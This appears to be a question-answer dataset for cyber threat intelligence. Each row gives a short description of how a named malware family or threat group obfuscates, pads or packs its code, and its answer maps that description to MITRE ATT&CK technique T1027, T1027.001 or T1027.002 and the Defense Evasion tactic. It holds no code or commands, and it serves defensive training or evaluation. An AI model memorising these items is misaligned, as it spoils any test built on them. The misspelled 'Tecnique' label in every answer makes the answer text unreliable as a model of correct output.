+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Final1stspy obfuscates strings with base64 encoding.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has been delivered within ZIP or RAR password-protected archived files.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy's decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert has encrypted strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has used Rotate on Right (RoR) and Rotate on Left (RoL) functionality to encrypt strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 uses multiple techniques to obfuscate strings, including XOR.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has used Base64 to encode malicious links. Hancitor has also delivered compressed payloads in ZIP files to victims.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq uses basic obfuscation in the form of spaghetti code.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer uses heavily obfuscated code in its Windows Notepad backdoor.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar is obfuscated using the open source ConfuserEx protector. Kazuar also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kerrdown can encrypt, encode, and compress multiple layers of shellcode.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk uses VMProtect to make reverse engineering the malware more difficult.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos encrypts all strings using RC4 and bundles all functionality into a single function call.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has obfuscated strings with base64 encoding.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD can Base64 encode output strings prior to sending to C2.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka obfuscates API function names using a substitute cipher combined with Base64 encoding.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke can use control flow flattening to obscure code.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI uses Base64 encoding for strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore’s plugins were obfuscated with Eazfuscater.NET 3.3.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can obfuscate strings using the congruential generator `(LCG): staten+1 = (690069 × staten + 1) mod 232`.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OLDBAIT obfuscates internal strings and unpacks them at startup.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. OopsIE also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Orz strings are base64 encoded, such as the embedded DLL known as MockDll.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Out1 has the ability to encode data.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHTRACK is loaded and executed by a highly obfuscated launcher.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora has the ability to compress stings with QuickLZ.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has been compressed and stored within a registry key. Pillowmint has also obfuscated the AES key used for encryption.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader obfuscates files by splitting strings into smaller sub-strings and including ""garbage"" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can use API hashing and modify the names of strings to evade detection.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used a custom encryption scheme for communication between scripts.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy hides any strings related to its own indicators of compromise.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can custom encrypt strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony attachments have been delivered via compressed archive files. Pony also obfuscates the memory flow by adding junk instructions when executing to make analysis more difficult.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can encrypt data prior to exfiltration by using an RSA public key.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm. RTM has also been delivered to targets as various archive files including ZIP, 7-ZIP, and RAR.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can use control-flow flattening or the commercially available .NET Reactor for obfuscation.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk can use anti-disassembly and code transformation obfuscation techniques.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHOTPUT is obscured using XOR encoding and appended to a valid GIF file.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWPULSE can hide malicious code in the padding regions between legitimate functions in the Pulse Secure `libdsplibs.so` file.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST strings were compressed and encoded in Base64. SUNBURST also obfuscated collected system information using a FNV-1a + XOR algorithm.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion process.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can encrypt victim data with an RC4 cipher.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has been obfuscated to help avoid detection.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can encrypt the names of requested APIs and deliver its final payload as a compressed, encrypted and base64 encoded blob.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic can use certain ConfuserEx features for obfuscation and can be encoded in a base64 string.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has encrypted its payload, a virtual file system, and various files.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon contains base64-encoded strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape itself is obfuscated and uses obfuscated API calls.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve has the ability to use a custom hex byte swapping encoding scheme combined with an obfuscated Base64 function to protect program strings and Telegram credentials.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 has the ability to obfuscate strings using XOR encryption.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster can use ""stackstrings"" for obfuscation.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang has the ability to encode and RC6 encrypt data sent to C2.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEARDROP created and read from a file with a fake JPG header, and its payload was encrypted with a simple rotating XOR cipher.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has used an encrypted Virtual File System to store plugins.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses non-descriptive names to hide functionality.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can use VMProtect for obfuscation.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to base64 encode and XOR encrypt strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A version of XTunnel introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT’s Java payload is encrypted with AES. Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of jRAT also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 used large size files to avoid detection by security solutions with hardcoded size limits.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 includes garbage code to mislead anti-malware software and researchers.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER downloader code has included ""0"" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.","Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has added extra spaces between JavaScript code characters to increase the overall file size.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used random junk code to obfuscate malware code.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has obfuscated .NET executables by inserting junk code.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa performed padding with null bytes before calculating its hash.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has inserted garbage characters into code, presumably to avoid anti-virus detection.","Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Moafee has been known to employ binary padding.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used junk code within their DLL files to hinder analysis.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has appended random binary data to the end of itself to generate a large binary.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta had added data prior to the Portable Executable (PE) header to prevent automatic scanners from identifying the payload.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL contains unused machine instructions in a likely attempt to hinder analysis.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CostaBricks has added the entire unobfuscated code of the legitimate open source application Blink to its code.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A variant of Emissary appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke has been packed with junk code and strings.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher contains junk code in its functions in an effort to confuse disassembly programs.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use junk code to hide functions and evade detection.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has had null characters padded in its malicious DLL payload.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro has added BMP images to the resources section of its Portable Executable (PE) file increasing each binary to at least 300MB in size.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has the ability to add bytes to change the file hash.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Javali can use large obfuscated libraries to hinder detection and analysis.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Before writing to disk, Kwampirs inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.","Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.","Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has used useless code blocks to counter analysis.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use large file sizes to evade detection.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has added four additional bytes of data upon launching, then saved the changed version as C:\ProgramData\Initech\Initech.exe.","Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SamSam has used garbage code to pad some of its malware components.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can obfuscate strings using junk Chinese characters.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can execute FileRecvWriteRand to append random bytes to the end of a file received from C2.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker contains junk code to increase its entropy and hide the actual code.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions.,"Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty contains junk code in its binary, likely to confuse malware analysts.","Tecnique: T1027.001 Obfuscated Files or Information: Binary Padding, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used UPX to pack a copy of Mimikatz.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used software packing in its tools.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dust Storm, the threat actors used UPX to pack some payloads.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 used UPX to pack files.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has been known to pack their tools.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has packed tools with UPX, and has repacked a modified version of Mimikatz to thwart anti-virus detection.","Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 uses packers such as Themida to obfuscate malicious files.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aoqin Dragon has used the Themida packer to obfuscate malicious payloads.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal has used UPX to pack Bandook.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has packed malware payloads before delivery to victims.,"Tecnique: T1027.002 Obfuscated Files or Information: Software Packing, Tactic: TA0005 Defense Evasion"
